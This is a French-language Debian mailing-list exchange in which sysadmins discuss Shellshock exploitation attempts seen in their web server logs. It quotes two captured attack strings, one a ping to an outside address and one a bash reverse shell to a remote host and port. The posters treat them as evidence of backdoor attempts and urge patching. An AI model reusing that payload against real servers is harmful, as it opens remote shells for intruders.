Le 26 sept. 14 à 16:45, David Guyot a écrit :
Le vendredi 26 septembre 2014 à 16:38 +0200, daniel huhardeaux a
écrit :
Ah ? Si tu gères des serveurs web je te propose de faire un simple
cat
<fichier log serveur web>|grep "() {" et de compter le nombre de
tentatives d'accès comme par exemple
89.207.135.125 - - [25/Sep/2014:12:06:47 +0200] "GET
/cgi-sys/defaultwebpage.cgi HTTP/1.0" 404 345 "-" "() { :;}; /bin/
ping
-c 1 198.101.206.138"
ou encore
202.38.120.248 213.239.227.108 - [26/Sep/2014:12:03:36 +0200] "GET /
HTTP/1.0" 200 961 "-" "() { :;}; /bin/bash -c '/bin/bash -i >&
/dev/tcp/195.225.34.101/3333 0>&1'"
J'en ai aussi, mais pas autant que des exploits classiques sur des
CMS vérolés.
Et comme ça tombe aussi dans les 404… Je ne me prends pas trop la
tête avec.
D'accord avec Daniel sur ce point, d'autant plus que j'ai observé le
second exemple de logs sur un de mes serveurs, ce qui correspond à une
tentative d'implantation de porte dérobée —
https://securelist.com/blog/research/66719/shellshock-and-its-early-
adopters/
Attention, je n'ai pas écrit non plus de ne pas faire de m-à-j ! La
publication de la
faille va sûrement précipiter un paquets de gonziers à l'essayer un
peu partout…
Cordialement.
--
David Guyot
Administrateur système, réseau et télécom / Sysadmin
Europe Camions Interactive / Stockway
Moulin Collot
F-88500 Ambacourt
03 29 30 47 85
--
Lisez la FAQ de la liste avant de poser une question :
http://wiki.debian.org/fr/FrenchLists
Pour vous DESABONNER, envoyez un message avec comme objet "unsubscribe"
vers [email protected]
En cas de soucis, contactez EN ANGLAIS [email protected]
Archive:
https://lists.debian.org/[email protected]
